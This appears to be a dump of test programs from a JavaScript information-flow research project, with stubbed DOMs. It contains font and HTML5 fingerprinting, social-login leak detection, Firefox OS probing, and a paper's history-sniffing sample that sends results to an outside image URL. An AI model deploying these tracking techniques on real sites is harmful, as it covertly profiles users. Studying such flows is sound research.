          'Blackadder ITC', 'BlairMdITC TT', 'Bodoni 72', 'Bodoni 72 Oldstyle', 'Bodoni 72 Smallcaps', 'Bodoni MT', 'Bodoni MT Black', 'Bodoni MT Condensed', 'Bodoni MT Poster Compressed',
          'Bookshelf Symbol 7', 'Boulder', 'Bradley Hand', 'Bradley Hand ITC', 'Bremen Bd BT', 'Britannic Bold', 'Broadway', 'Browallia New', 'BrowalliaUPC', 'Brush Script MT', 'Californian FB', 'Calisto MT', 'Calligrapher', 'Candara',
          'CaslonOpnface BT', 'Castellar', 'Centaur', 'Cezanne', 'CG Omega', 'CG Times', 'Chalkboard', 'Chalkboard SE', 'Chalkduster', 'Charlesworth', 'Charter Bd BT', 'Charter BT', 'Chaucer',
          'ChelthmITC Bk BT', 'Chiller', 'Clarendon', 'Clarendon Condensed', 'CloisterBlack BT', 'Cochin', 'Colonna MT', 'Constantia', 'Cooper Black', 'Copperplate', 'Copperplate Gothic', 'Copperplate Gothic Bold',
          'Copperplate Gothic Light', 'CopperplGoth Bd BT', 'Corbel', 'Cordia New', 'CordiaUPC', 'Cornerstone', 'Coronet', 'Cuckoo', 'Curlz MT', 'DaunPenh', 'Dauphin', 'David', 'DB LCD Temp', 'DELICIOUS', 'Denmark',
          'DFKai-SB', 'Didot', 'DilleniaUPC', 'DIN', 'DokChampa', 'Dotum', 'DotumChe', 'Ebrima', 'Edwardian Script ITC', 'Elephant', 'English 111 Vivace BT', 'Engravers MT', 'EngraversGothic BT', 'Eras Bold ITC', 'Eras Demi ITC', 'Eras Light ITC', 'Eras Medium ITC',
          'EucrosiaUPC', 'Euphemia', 'Euphemia UCAS', 'EUROSTILE', 'Exotc350 Bd BT', 'FangSong', 'Felix Titling', 'Fixedsys', 'FONTIN', 'Footlight MT Light', 'Forte',
          'FrankRuehl', 'Fransiscan', 'Freefrm721 Blk BT', 'FreesiaUPC', 'Freestyle Script', 'French Script MT', 'FrnkGothITC Bk BT', 'Fruitger', 'FRUTIGER',
          'Futura', 'Futura Bk BT', 'Futura Lt BT', 'Futura Md BT', 'Futura ZBlk BT', 'FuturaBlack BT', 'Gabriola', 'Galliard BT', 'Gautami', 'Geeza Pro', 'Geometr231 BT', 'Geometr231 Hv BT', 'Geometr231 Lt BT', 'GeoSlab 703 Lt BT',
          'GeoSlab 703 XBd BT', 'Gigi', 'Gill Sans', 'Gill Sans MT', 'Gill Sans MT Condensed', 'Gill Sans MT Ext Condensed Bold', 'Gill Sans Ultra Bold', 'Gill Sans Ultra Bold Condensed', 'Gisha', 'Gloucester MT Extra Condensed', 'GOTHAM', 'GOTHAM BOLD',
          'Goudy Old Style', 'Goudy Stout', 'GoudyHandtooled BT', 'GoudyOLSt BT', 'Gujarati Sangam MN', 'Gulim', 'GulimChe', 'Gungsuh', 'GungsuhChe', 'Gurmukhi MN', 'Haettenschweiler', 'Harlow Solid Italic', 'Harrington', 'Heather', 'Heiti SC', 'Heiti TC', 'HELV',
          'Herald', 'High Tower Text', 'Hiragino Kaku Gothic ProN', 'Hiragino Mincho ProN', 'Hoefler Text', 'Humanst 521 Cn BT', 'Humanst521 BT', 'Humanst521 Lt BT', 'Imprint MT Shadow', 'Incised901 Bd BT', 'Incised901 BT',
          'Incised901 Lt BT', 'INCONSOLATA', 'Informal Roman', 'Informal011 BT', 'INTERSTATE', 'IrisUPC', 'Iskoola Pota', 'JasmineUPC', 'Jazz LET', 'Jenson', 'Jester', 'Jokerman', 'Juice ITC', 'Kabel Bk BT', 'Kabel Ult BT', 'Kailasa', 'KaiTi', 'Kalinga', 'Kannada Sangam MN',
          'Kartika', 'Kaufmann Bd BT', 'Kaufmann BT', 'Khmer UI', 'KodchiangUPC', 'Kokila', 'Korinna BT', 'Kristen ITC', 'Krungthep', 'Kunstler Script', 'Lao UI', 'Latha', 'Leelawadee', 'Letter Gothic', 'Levenim MT', 'LilyUPC', 'Lithograph', 'Lithograph Light', 'Long Island',
          'Lydian BT', 'Magneto', 'Maiandra GD', 'Malayalam Sangam MN', 'Malgun Gothic',
          'Mangal', 'Marigold', 'Marion', 'Marker Felt', 'Market', 'Marlett', 'Matisse ITC', 'Matura MT Script Capitals', 'Meiryo', 'Meiryo UI', 'Microsoft Himalaya', 'Microsoft JhengHei', 'Microsoft New Tai Lue', 'Microsoft PhagsPa', 'Microsoft Tai Le',
          'Microsoft Uighur', 'Microsoft YaHei', 'Microsoft Yi Baiti', 'MingLiU', 'MingLiU_HKSCS', 'MingLiU_HKSCS-ExtB', 'MingLiU-ExtB', 'Minion', 'Minion Pro', 'Miriam', 'Miriam Fixed', 'Mistral', 'Modern', 'Modern No. 20', 'Mona Lisa Solid ITC TT', 'Mongolian Baiti',
          'MONO', 'MoolBoran', 'Mrs Eaves', 'MS LineDraw', 'MS Mincho', 'MS PMincho', 'MS Reference Specialty', 'MS UI Gothic', 'MT Extra', 'MUSEO', 'MV Boli',
          'Nadeem', 'Narkisim', 'NEVIS', 'News Gothic', 'News GothicMT', 'NewsGoth BT', 'Niagara Engraved', 'Niagara Solid', 'Noteworthy', 'NSimSun', 'Nyala', 'OCR A Extended', 'Old Century', 'Old English Text MT', 'Onyx', 'Onyx BT', 'OPTIMA', 'Oriya Sangam MN',
          'OSAKA', 'OzHandicraft BT', 'Palace Script MT', 'Papyrus', 'Parchment', 'Party LET', 'Pegasus', 'Perpetua', 'Perpetua Titling MT', 'PetitaBold', 'Pickwick', 'Plantagenet Cherokee', 'Playbill', 'PMingLiU', 'PMingLiU-ExtB',
          'Poor Richard', 'Poster', 'PosterBodoni BT', 'PRINCETOWN LET', 'Pristina', 'PTBarnum BT', 'Pythagoras', 'Raavi', 'Rage Italic', 'Ravie', 'Ribbon131 Bd BT', 'Rockwell', 'Rockwell Condensed', 'Rockwell Extra Bold', 'Rod', 'Roman', 'Sakkal Majalla',
          'Santa Fe LET', 'Savoye LET', 'Sceptre', 'Script', 'Script MT Bold', 'SCRIPTINA', 'Serifa', 'Serifa BT', 'Serifa Th BT', 'ShelleyVolante BT', 'Sherwood',
          'Shonar Bangla', 'Showcard Gothic', 'Shruti', 'Signboard', 'SILKSCREEN', 'SimHei', 'Simplified Arabic', 'Simplified Arabic Fixed', 'SimSun', 'SimSun-ExtB', 'Sinhala Sangam MN', 'Sketch Rockwell', 'Skia', 'Small Fonts', 'Snap ITC', 'Snell Roundhand', 'Socket',
          'Souvenir Lt BT', 'Staccato222 BT', 'Steamer', 'Stencil', 'Storybook', 'Styllo', 'Subway', 'Swis721 BlkEx BT', 'Swiss911 XCm BT', 'Sylfaen', 'Synchro LET', 'System', 'Tamil Sangam MN', 'Technical', 'Teletype', 'Telugu Sangam MN', 'Tempus Sans ITC',
          'Terminal', 'Thonburi', 'Traditional Arabic', 'Trajan', 'TRAJAN PRO', 'Tristan', 'Tubular', 'Tunga', 'Tw Cen MT', 'Tw Cen MT Condensed', 'Tw Cen MT Condensed Extra Bold',
          'TypoUpright BT', 'Unicorn', 'Univers', 'Univers CE 55 Medium', 'Univers Condensed', 'Utsaah', 'Vagabond', 'Vani', 'Vijaya', 'Viner Hand ITC', 'VisualUI', 'Vivaldi', 'Vladimir Script', 'Vrinda', 'Westminster', 'WHITNEY', 'Wide Latin',
          'ZapfEllipt BT', 'ZapfHumnst BT', 'ZapfHumnst Dm BT', 'Zapfino', 'Zurich BlkEx BT', 'Zurich Ex BT', 'ZWAdobeF']

        if (that.options.extendedJsFonts) {
          fontList = fontList.concat(extendedFontList)
        }

        fontList = fontList.concat(that.options.userDefinedFonts)

        // we use m or w because these two characters take up the maximum width.
        // And we use a LLi so that the same matching fonts can get separated
        var testString = 'mmmmmmmmmmlli'

        // we test using 72px font size, we may use any size. I guess larger the better.
        var testSize = '72px'

//        var h = document.getElementsByTagName('body')[0]
          var h = document.body.element1; 

         document.div1 = {offsetWidth : 10, offsetHeight: 25, style : {fontSize: ""} };

        // div to load spans for the base fonts
//        var baseFontsDiv = document.createElement('div')
        var baseFontsDiv = document.div1
 
         document.div2 = {offsetWidth : 10, offsetHeight: 25, style : {fontSize: ""} };

        // div to load spans for the fonts to detect
//        var fontsDiv = document.createElement('div')
        var fontsDiv = document.div2;

        var defaultWidth = {}
        var defaultHeight = {}

        // creates a span where the fonts will be loaded
        var num = 1; 
        var createSpan = function () {
	 num++; 
         var span = "span" + num 
         document.span = {offsetWidth : 10, offsetHeight: 25, style : {fontSize: ""} };
         console.log(document)
 //         var s = document.createElement('span')
         var s = document.span;
            /*
             * We need this css as in some weird browser this
             * span elements shows up for a microSec which creates a
             * bad user experience
             */
          s.style.position = 'absolute'
          s.style.left = '-9999px'
          s.style.fontSize = testSize
          s.style.lineHeight = 'normal'
          s.innerHTML = testString
          return s
        }

        // creates a span and load the font to detect and a base font for fallback
        var createSpanWithFonts = function (fontToDetect, baseFont) {
          var s = createSpan()
          s.style.fontFamily = "'" + fontToDetect + "'," + baseFont
          return s
        }

        // creates spans for the base fonts and adds them to baseFontsDiv
        var initializeBaseFontsSpans = function () {
          var spans = []
          for (var index = 0, length = baseFonts.length; index < length; index++) {
            var s = createSpan()
            s.style.fontFamily = baseFonts[index]
//          baseFontsDiv.appendChild(s)
            baseFontsDiv.element3 = s;
            spans.push(s)
          }
          return spans
        }

        // creates spans for the fonts to detect and adds them to fontsDiv
        var initializeFontsSpans = function () {
          var spans = {}
          for (var i = 0, l = fontList.length; i < l; i++) {
            var fontSpans = []
            for (var j = 0, numDefaultFonts = baseFonts.length; j < numDefaultFonts; j++) {
              var s = createSpanWithFonts(fontList[i], baseFonts[j])
//              fontsDiv.appendChild(s)
	      fontsDiv.element4 = s;
              fontSpans.push(s)
            }
            spans[fontList[i]] = fontSpans // Stores {fontName : [spans for that font]}
          }
          return spans
        }

        // checks if a font is available
        var isFontAvailable = function (fontSpans) {
          var detected = false
          for (var i = 0; i < baseFonts.length; i++) {
           var random1 = (Math.floor((Math.random() * 10) +1) % 2);
           var random2 = (Math.floor((Math.random() * 10) +1) % 2);
            detected = (((fontSpans[i].offsetWidth + random1) !== defaultWidth[baseFonts[i]]) || ((fontSpans[i].offsetHeight + random2) !== defaultHeight[baseFonts[i]]))
            if (detected) {
              return detected
            }
          }
          return detected
        }

        // create spans for base fonts
        var baseFontsSpans = initializeBaseFontsSpans()

        // add the spans to the DOM
//        h.appendChild(baseFontsDiv)
         h.element5 = baseFontsDiv  
        // get the default width for the three base fonts
        for (var index = 0, length = baseFonts.length; index < length; index++) {
          defaultWidth[baseFonts[index]] = baseFontsSpans[index].offsetWidth // width for the default font
          defaultHeight[baseFonts[index]] = baseFontsSpans[index].offsetHeight // height for the default font
        }

        // create spans for fonts to detect
        var fontsSpans = initializeFontsSpans()

        // add all the spans to the DOM
//        h.appendChild(fontsDiv)
          h.element6 = fontsDiv
        // check available fonts
        var available = []
        for (var i = 0, l = fontList.length; i < l; i++) {
          if (isFontAvailable(fontsSpans[fontList[i]])) {
            available.push(fontList[i])
          }
        }

        // remove spans from DOM
//        h.removeChild(fontsDiv)
//        h.removeChild(baseFontsDiv)
    	delete h.element5;
	delete h.element6;

//console.log(available);

//        keys.addPreprocessedComponent({key: 'js_fonts', value: available})
//        done(keys)
//      }, 1)
 //   },


==> observableflows/html5Flags.js <==
// https://www.privacytool.org/AnonymityChecker/
// Fingerprinting through html5 attributes
// Implicit flow through exceptions - quite interesting.
// Each assignment to b.type may throw an exception or assign "" 
// Need to model the sematics of b.type = "someString"

// Sources: document.*, sink: console.log()

var document = {};

function getHtml5Flags() {
    var a = ""
//      , b = document.createElement("input");
      , b = document.input = {};

    try {
//        b.type = "text",
        b.type = (Math.random() >= 0.5) ? "text" : "",
        a = "text" == b.type ? a + "1" : a + "0"
    } catch (c) {
        a += "0"
    }
    try {
//        b.type = "search",
        b.type = (Math.random() >= 0.5) ? "search" : "",
        a = "search" == b.type ? a + "1" : a + "0"
    } catch (d) {
        a += "0"
    }
    try {
//        b.type = "tel",
        b.type = (Math.random() >= 0.5) ? "tel" : "",
        a = "tel" == b.type ? a + "1" : a + "0"
    } catch (e) {
        a += "0"
    }
    try {
//        b.type = "url",
        b.type = (Math.random() >= 0.5) ? "url" : "",
        a = "url" == b.type ? a + "1" : a + "0"
    } catch (f) {
        a += "0"
    }
    try {
//        b.type = "email",
        b.type = (Math.random() >= 0.5) ? "email" : "",
        a = "email" == b.type ? a + "1" : a + "0"
    } catch (g) {
        a += "0"
    }
    try {
//        b.type = "datetime",
        b.type = (Math.random() >= 0.5) ? "datetime" : "",
        a = "datetime" == b.type ? a + "1" : a + "0"
    } catch (h) {
        a += "0"
    }
    try {
//        b.type = "date",
        b.type = (Math.random() >= 0.5) ? "date" : "",
        a = "date" == b.type ? a + "1" : a + "0"
    } catch (i) {
        a += "0"
    }
    try {
//        b.type = "month",
        b.type = (Math.random() >= 0.5) ? "month" : "",
        a = "month" == b.type ? a + "1" : a + "0"
    } catch (j) {
        a += "0"
    }
    try {
//        b.type = "week",
        b.type = (Math.random() >= 0.5) ? "week" : "",
        a = "week" == b.type ? a + "1" : a + "0"
    } catch (k) {
        a += "0"
    }
    try {
//        b.type = "time",
        b.type = (Math.random() >= 0.5) ? "time" : "",
        a = "time" == b.type ? a + "1" : a + "0"
    } catch (l) {
        a += "0"
    }
    try {
//        b.type = "datetime-local",
        b.type = (Math.random() >= 0.5) ? "datetime-local" : "",
        a = "datetime-local" == b.type ? a + "1" : a + "0"
    } catch (m) {
        a += "0"
    }
    try {
//        b.type = "number",
        b.type = (Math.random() >= 0.5) ? "number" : "",
        a = "number" == b.type ? a + "1" : a + "0"
    } catch (n) {
        a += "0"
    }
    try {
//        b.type = "range",
        b.type = (Math.random() >= 0.5) ? "range" : "",
        a = "range" == b.type ? a + "1" : a + "0"
    } catch (o) {
        a += "0"
    }
    try {
//        b.type = "color",
        b.type = (Math.random() >= 0.5) ? "color" : "",
        a = "color" == b.type ? a + "1" : a + "0"
    } catch (p) {
        a += "0"
    }
    try {
//        b.type = "checkbox",
        b.type = (Math.random() >= 0.5) ? "checkbox" : "",
        a = "checkbox" == b.type ? a + "1" : a + "0"
    } catch (q) {
        a += "0"
    }
    try {
//        b.type = "image",
        b.type = (Math.random() >= 0.5) ? "image" : "",
        a = "image" == b.type ? a + "1" : a + "0"
    } catch (r) {
        a += "0"
    }
    try {
//        b.type = "file",
        b.type = (Math.random() >= 0.5) ? "file" : "",
        a = "file" == b.type ? a + "1" : a + "0"
    } catch (s) {
        a += "0"
    }
//    b = document.createElement("textarea");
    b = document.textarea = {};
    a = "undefined" != typeof HTMLTextAreaElement && b instanceof HTMLTextAreaElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("select");
    b = document.select = {};
    a = "undefined" != typeof HTMLSelectElement && b instanceof HTMLSelectElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("fieldset");
    b = document.fieldset = {};
    a = "undefined" != typeof HTMLFieldSetElement && b instanceof HTMLFieldSetElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("datalist");
    b = document.datalist = {};
    a = "undefined" != typeof HTMLDataListElement && b instanceof HTMLDataListElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("keygen");
    b = document.keygen = {};
    a = "undefined" != typeof HTMLKeygenElement && b instanceof HTMLKeygenElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("output");
    b = document.output = {};
    a = "undefined" != typeof HTMLOutputElement && b instanceof HTMLOutputElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("progress");
    b = document.progress = {};
    a = "undefined" != typeof HTMLProgressElement && b instanceof HTMLProgressElement || (Math.random() >= 0.5) ? a + "1" : a + "0";
//    b = document.createElement("meter");
    b = document.meter = {};
    return "undefined" != typeof HTMLMeterElement && b instanceof HTMLMeterElement || (Math.random() >= 0.5) ? a + "1" : a + "0"
};

console.log(getHtml5Flags());


==> observableflows/login.js <==
// extracted from https://robinlinus.github.io/socialmedia-leak/
// Source: onLoadResult, Sink: console.log(document.innerHTML)

var document = {};

var leakSocialMediaAccounts = function(callback) {
    var platforms = [{
        domain: "https://squareup.com",
        redirect: "/login?return_to=%2Ffavicon.ico",
        name: "Square"
    }, {
        domain: "https://twitter.com",
        redirect: "/login?redirect_after_login=%2Ffavicon.ico",
        name: "Twitter"
    }, {
        domain: "https://www.facebook.com",
        redirect: "/login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp",
        name: "Facebook"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=en&service=mail",
        name: "Gmail"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&uilel=3&hl=en&service=youtube",
        name: "Youtube"
    }, {
        domain: "https://plus.google.com",
        redirect: "/up/accounts/upgrade/?continue=https://plus.google.com/favicon.ico",
        name: "Google Plus"
    }, {
        domain: "https://login.skype.com",
        redirect: "/login?message=signin_continue&redirect_uri=https%3A%2F%2Fsecure.skype.com%2Ffavicon.ico",
        name: "Skype"
    }, {
        domain: "https://www.flickr.com",
        redirect: "/signin/yahoo/?redir=https%3A%2F%2Fwww.flickr.com/favicon.ico",
        name: "Flickr"
    }, {
        domain: "https://www.spotify.com",
        redirect: "/en/login/?forward_url=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico",
        name: "Spotify"
    }, {
        domain: "https://www.reddit.com",
        redirect: "/login?dest=https%3A%2F%2Fwww.reddit.com%2Ffavicon.ico",
        name: "Reddit"
    }, {
        domain: "https://www.tumblr.com",
        redirect: "/login?redirect_to=%2Ffavicon.ico",
        name: "Tumblr"
    }, {
        domain: "https://www.expedia.de",
        redirect: "/user/login?ckoflag=0&selc=0&uurl=qscr%3Dreds%26rurl%3D%252Ffavicon.ico",
        name: "Expedia"
    }, {
        domain: "https://www.dropbox.com",
        redirect: "/login?cont=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fimages%2Fabout%2Fdropbox_logo_glyph_2015.svg",
        name: "Dropbox"
    }, {
        domain: "https://www.amazon.com",
        redirect: "/ap/signin/178-4417027-1316064?_encoding=UTF8&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=10000000&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Ffavicon.ico",
        name: "Amazon.com"
    }, {
        domain: "https://www.pinterest.com",
        redirect: "/login/?next=https%3A%2F%2Fwww.pinterest.com%2Ffavicon.ico",
        name: "Pinterest"
    }, {
        domain: "https://de.foursquare.com",
        redirect: "/login?continue=%2Ffavicon.ico",
        name: "Foursquare"
    }, {
        domain: "https://eu.battle.net",
        redirect: "/login/de/index?ref=http://eu.battle.net/favicon.ico",
        name: "Battle.net"
    }, {
        domain: "https://store.steampowered.com",
        redirect: "/login/?redir=favicon.ico",
        name: "Steam"
    }, {
        domain: "https://www.academia.edu",
        redirect: "/login?cp=/favicon.ico&cs=www",
        name: "Academia.edu"
    }, {
        domain: "https://accounts.google.com",
        redirect: "/ServiceLogin?service=blogger&hl=de&passive=1209600&continue=https://www.blogger.com/favicon.ico",
        name: "Blogger"
    }, {
        domain: "https://github.com",
        redirect: "/login?return_to=https%3A%2F%2Fgithub.com%2Ffavicon.ico%3Fid%3D1",
        name: "Github"
    }, {
        domain: "https://medium.com",
        redirect: "/m/signin?redirect=https%3A%2F%2Fmedium.com%2Ffavicon.ico&loginType=default",
        name: "Medium"
    }, {
        domain: "https://news.ycombinator.com",
        redirect: "/login?goto=y18.gif%23",
        name: "Hackernews"
    }, {
        domain: "https://carbonmade.com",
        redirect: "/signin?returnTo=favicon.ico",
        name: "Carbonmade"
    }, {
        domain: "https://courses.edx.org",
        redirect: "/login?next=/favicon.ico",
        name: "EdX"
    }, {
        domain: "https://slack.com",
        redirect: "/checkcookie?redir=https%3A%2F%2Fslack.com%2Ffavicon.ico%23",
        name: "Slack"
    }, {
        domain: "https://www.khanacademy.org",
        redirect: "/login?continue=https%3A//www.khanacademy.org/favicon.ico",
        name: "Khan Academy"
    }, {
        domain: "https://www.paypal.com",
        redirect: "/signin?returnUri=https://t.paypal.com/ts?v=1.0.0",
        name: "Paypal"
    }, {
        domain: "https://500px.com",
        redirect: "/login?r=%2Ffavicon.ico",
        name: "500px"
    }, {
        domain: "https://www.airbnb.com",
        redirect: "/login?redirect_params[action]=favicon.ico&redirect_params[controller]=home",
        name: "Airbnb"
    }, {
        domain: "https://disqus.com",
        redirect: "/profile/login/?next=https%3A%2F%2Fdisqus.com%2Ffavicon.ico",
        name: "Disqus"
    }, {
        domain: "https://secure.meetup.com",
        redirect: "/login/?returnUri=https%3A%2F%2Fwww.meetup.com%2Fimg%2Fajax_loader_trans.gif",
        name: "Meetup"
    }, {
        domain: "https://bitbucket.org",
        redirect: "/account/signin/?next=/favicon.ico",
        name: "BitBucket"
    }, {
        domain: "https://secure.indeed.com",
        redirect: "/account/login?continue=%2ffavicon.ico",
        name: "Indeed"
    }, {
        domain: "https://vk.com",
        redirect: "/login?u=2&to=ZmF2aWNvbi5pY28-",
        name: "VK"
    }];

    platforms.forEach(function(network) {
//      var img = document.createElement('img');
	document.img = {};
	var img =  document.img;
        img.src = network.domain + network.redirect;
        var onLoadResult = (Math.random() >= 0.5);
    if (onLoadResult){
        img.onload = function() {
            callback(network, true);
        }();
    }
    else {
        img.onerror = function() {
            callback(network, false);
        }();
    }	
    });
};



// Do not work (anymore)
// {
//     url: "https://login.live.com/login.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fprofile.microsoft.com%2FregsysProfilecenter%2FImages%2FLogin.jpg",
//     name: "Microsoft"
// }, {
//     url: "https://slack.com/signin?redir=%2Ffavicon.ico",
//     name: "Slack"
// }, {
//     url: "https://tablet.www.linkedin.com/splash?redirect_url=https%3A%2F%2Fwww.linkedin.com%2Ffavicon.ico%3Fgid%3D54384%26trk%3Dfulpro_grplogo",
//     name: "Linkedin"
// }, {
//      domain: "https://subscribe.washingtonpost.com/loginregistration/index.html#/register/group/default?action=login&destination=https:%2F%2Fwashingtonpost.com%2Ffavicon.ico",
//      redirect: "/login/?previous=/favicon.ico",
//      name: "Washington Post"
// }, {
//      domain: "https://www.instagram.com",
//      redirect: "/accounts/login/?next=%2Ffavicon.ico",
//      name: "Instagram"
//  },{
//     domain: "https://www.spiegel.de",
//     redirect: "/meinspiegel/login.html?backUrl=%2Ffavicon.ico",
//     name: "Spiegel Online"
// },{
//     domain: "http://www.youporn.com",
//     redirect: "/login/?previous=/favicon.ico",
//     name: "YouPorn"
// },{
//     domain: "https://stackoverflow.com",
//     redirect: "/users/login?ssrc=head&returnurl=http%3a%2f%2fstackoverflow.com%2ffavicon.ico",
//     name: "Stack Overflow"
// },{
//     domain: "https://www.netflix.com",
//     redirect: "/Login?nextpage=%2Ffavicon.ico",
//     name: "Netflix"
// },

   var isFirstLoggedIn = true;

    function displayResult(network, loggedIn) {
        var id = loggedIn ? 'loggedIn' : 'notLoggedIn';
        var favicon = faviconUri(network);
        var url = network.domain + network.redirect;
        var el = '<a target="_blank" href="' + url + '" target="_blank" class=network><img src=' + favicon + '><span>' + network.name + '</span></a>';
        if (loggedIn && isFirstLoggedIn) {
            isFirstLoggedIn = false;
//            document.getElementById(id).innerHTML = el;
            document.innerHTML = el;
        } else {
//            document.getElementById(id).innerHTML += el;
            document.innerHTML += el;
        }
	console.log(document.innerHTML);
    }
    leakSocialMediaAccounts(displayResult);

    function faviconUri(network) {
        var favicon = network.domain + '/favicon.ico';
        if (network.name === 'Dropbox') {
            favicon = 'https://www.dropbox.com/static/images/favicon.ico';
        }
        if (network.name === 'Youtube') {
            favicon = 'https://www.youtube.com/favicon.ico';
        }
        if (network.name === 'Gmail') {
            favicon = 'https://mail.google.com/favicon.ico';
        }
        return favicon;
    }
 


==> observableflows/resourceReaderFirefox.js <==
//taken from: https://browserleaks.com/firefox#more
// High source: read local resources, i.e. e.src
// Low sink: console.log()

/**
*  OS Detection using firefox.js
*
*  (c) 2015 https://browserleaks.com/firefox
*  License: CC-BY-NC-ND
*/
 
var keyVal = [["browser.gesture.pinch.out", "cmd_fullZoomEnlarge"], 
	      ["browser.backspace_action" , "2"], 
              ["browser.gesture.pinch.threshold" , "150"],
	      ["other" , "other"]	
];

var document = {};

var include = function(load, err) {
    document.script = {};	
 //   var el = document.createElement("script");
    var el = document.script;
    el.type = "text/javascript";
    el.onload = load;
    el.onerror = err;
//    document.head.appendChild(el);
    document.head = el;
    el.src = "resource:///defaults/preferences/firefox.js";
    if (el.src.includes("resource") && (Math.random() >= 0.5)){
	el.onload();
    }
    else {
	el.onerror();
    }	
}
 
var pref,
    sticky_pref,
    os;
 
pref = sticky_pref = function(key, val) {
    if (!os)
        if (key == "browser.gesture.pinch.out" && val == "cmd_fullZoomEnlarge")
            os = "Windows";
        else if (key == "browser.backspace_action" && val == "2")
            os = "Linux";
        else if (key == "browser.gesture.pinch.threshold" && val == "150")
            os = "Mac";
}

var i = (Math.floor((Math.random() * 1000) +1) % 4);
pref(keyVal[i][0], keyVal[i][1]);
 
include(function() {
    console.log( "OS: " + (os ? os : "unknown") );
},function() {
    console.log( "OS: n/a (not a Firefox)" );
});



==> observableflows/yp_js.js <==
//Example from the paper "An Empirical Study of Privacy-Violating Information Flows
//in JavaScript Web Applications" 

// Sources: document.element.color (high), navigatorAppName (low)
// Sinks: document.img.src (low)


//This is a fake DOM slice to run the example 


  
var document = {ol: {},  element: {color : "rgb(12, 34, 56)"}, img:{src:""}};


var k = { 0: "qpsoivc/dpn", 1: "sfeuvcf/dpn"}; //23 entries in the original example
var g = [];
for(var m in k) {
  var d = k[m];
  var a = "";
  for(var f = 0; f < d.length; f++) {
    a += String.fromCharCode(d.charCodeAt(f)-1);
  }
  console.log(a); //decoding the array entry	
  var h = false;
  for(var j in {"http://":"","http://www.":""}){
//      var l = document.createElement("a"); // replaced by the next 2 lines
	document.element.a="a";
        l=document.element;
        l.href = j + a;
    	console.log(l.href);	
//    	document.getElementById("ol").appendChild(l); // replaced by next line
	document.ol.link = l;
        var e = "";

    var navigatorAppName = "Chrome";  // replaces navigator.appName 
    if(navigatorAppName.indexOf("Microsoft") != -1 ){
//       e = l.currentStyle.color; // replaced by next line
	 e = document.element.color;
   } 
   else {
//       e = document.defaultView.getComputedStyle(l, null).getPropertyValue("color");
	e = document.element.color;
    }
    console.log("Color:" + e);	

   if(e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true; }
  }
  if(h) { g.push(m); }
}
var b = (g instanceof Array)? g.join(",") : "";
//var c = document.createElement("img");
var c = document.img;
c.src= "http://ol.youporn.com/blank.gif?id="+b;
console.log(c.src);	
//document.getElementById("ol").appendChild(c)
document.ol.link1 = c;
console.log(document.ol.link1);



==> results/VENN-Diag/FileSaver.js <==



<!DOCTYPE html>
<html lang="en" class="">
  <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# object: http://ogp.me/ns/object# article: http://ogp.me/ns/article# profile: http://ogp.me/ns/profile#">
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Language" content="en">
    
    
    <title>FileSaver.js/FileSaver.js at master · eligrey/FileSaver.js · GitHub</title>
    <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
    <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
    <link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-114.png">
    <link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114.png">
    <link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-144.png">
    <link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144.png">
    <meta property="fb:app_id" content="1401488693436528">

      <meta content="@github" name="twitter:site" /><meta content="summary" name="twitter:card" /><meta content="eligrey/FileSaver.js" name="twitter:title" /><meta content="FileSaver.js - An HTML5 saveAs() FileSaver implementation" name="twitter:description" /><meta content="https://avatars3.githubusercontent.com/u/46995?v=3&amp;s=400" name="twitter:image:src" />
      <meta content="GitHub" property="og:site_name" /><meta content="object" property="og:type" /><meta content="https://avatars3.githubusercontent.com/u/46995?v=3&amp;s=400" property="og:image" /><meta content="eligrey/FileSaver.js" property="og:title" /><meta content="https://github.com/eligrey/FileSaver.js" property="og:url" /><meta content="FileSaver.js - An HTML5 saveAs() FileSaver implementation" property="og:description" />
      <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
    <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
    <link rel="assets" href="https://assets-cdn.github.com/">
    
    <meta name="pjax-timeout" content="1000">
    

    <meta name="msapplication-TileImage" content="/windows-tile.png">
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="selected-link" value="repo_source" data-pjax-transient>
      <meta name="google-analytics" content="UA-3769691-2">

    <meta content="collector.githubapp.com" name="octolytics-host" /><meta content="collector-cdn.github.com" name="octolytics-script-host" /><meta content="github" name="octolytics-app-id" /><meta content="8D0C43B4:2D2B:30CCADE:555EF4C7" name="octolytics-dimension-request_id" />
    
    <meta content="Rails, view, blob#show" name="analytics-event" />
    <meta class="js-ga-set" name="dimension1" content="Logged Out">
